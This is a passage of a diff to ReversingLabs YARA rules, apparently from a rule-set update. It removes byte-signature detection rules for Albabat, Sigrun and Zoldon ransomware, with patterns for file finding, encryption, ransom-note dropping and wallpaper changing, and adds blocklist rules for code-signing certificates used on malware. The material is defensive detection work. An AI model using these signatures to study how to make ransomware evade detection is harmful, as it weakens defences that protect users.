(pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "df467418-9d57-5ad0-b396-2ef519a22989" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13112-L13128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE { meta: - description = "Yara rule that detects Albabat ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "11941c0d-45fb-5746-bbad-f43f336d4b1d" - date = "2024-03-18" - modified = "2024-03-18" + id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13130-L13148" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Albabat" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ?? - ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57 - F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D - 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D - ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 - 89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? - ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 - 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48 - 89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ?? - 48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? - ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ?? - ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 - } - $encrypt_files_p2 = { - C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ?? - 48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ?? - ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ?? - ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? - ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? - 48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B - 93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D - ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ?? - ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D - 35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ?? - ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? - ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? - ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B - 14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ?? - FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - } - $drop_ransom_note = { - 48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 - 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? - ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 - F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ?? - ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ?? - 49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19 - 4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48 - 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 - ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C - 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? - ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 - C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ?? - ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15 - ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 - 8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? - ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B - 8C 24 ?? ?? ?? ?? 48 85 C9 74 - } - $change_desktop_wallpaper = { - 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? - ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74 - ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D - 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C - 8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ?? - ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C - 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? - ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D - 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D - ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ?? - ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? - ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ?? - ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55 - } - $find_files_p1 = { - 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? - ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74 - ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B - 74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B - 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ?? - ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85 - DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8 - ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC - 48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ?? - ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ?? - ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC - } - $find_files_p2 = { - 73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ?? - ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68 - ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 - 8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ?? - 48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39 - CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ?? - 4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C - 24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? - 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ?? - ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B - 54 24 ?? 4D 89 E8 E8 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) and ($change_desktop_wallpaper) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Amma" and (pe.signatures[i].serial=="00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures[i].serial=="cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2") and 1431734400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE { meta: - description = "Yara rule that detects Sigrun ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fa627192-ed80-5115-a028-014f67f4571d" - date = "2020-07-15" - modified = "2020-07-15" + id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13150-L13166" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sigrun" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ?? - ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF - 75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? - A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8 - ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 - FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D - 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 - ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? - 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? - ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 - 24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 - 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E - 33 C0 5B 8B E5 5D C3 - } - $encrypt_files_1 = { - 55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3 - 56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? - C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ?? - ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 - FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3 - } - $encrypt_files_2 = { - 55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ?? - ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85 - C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ?? - ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56 - 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? - 5B 5D C3 - } - $encrypt_files_3 = { - 55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45 - ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8 - ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ?? - C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 - ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? - 57 FF D6 5F 33 C0 5E 8B E5 5D C3 - } - $enum_resources_1 = { - 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ?? - ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ?? - ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF - 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86 - ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? - 6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? - 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF - } - $enum_resources_2 = { - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF - 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ?? - ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? - C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? - 33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? - ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D - 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74 - 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? - 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24 - ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B - C6 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($enum_resources_*)) and ($find_files) and ( all of ($encrypt_files_*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SpectorSoft Corp." and pe.signatures[i].serial=="5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE { meta: - description = "Yara rule that detects Zoldon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80" - date = "2020-07-15" - modified = "2020-07-15" + id = "d29e2342-2d38-5939-aa3f-4506fb36c74a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = 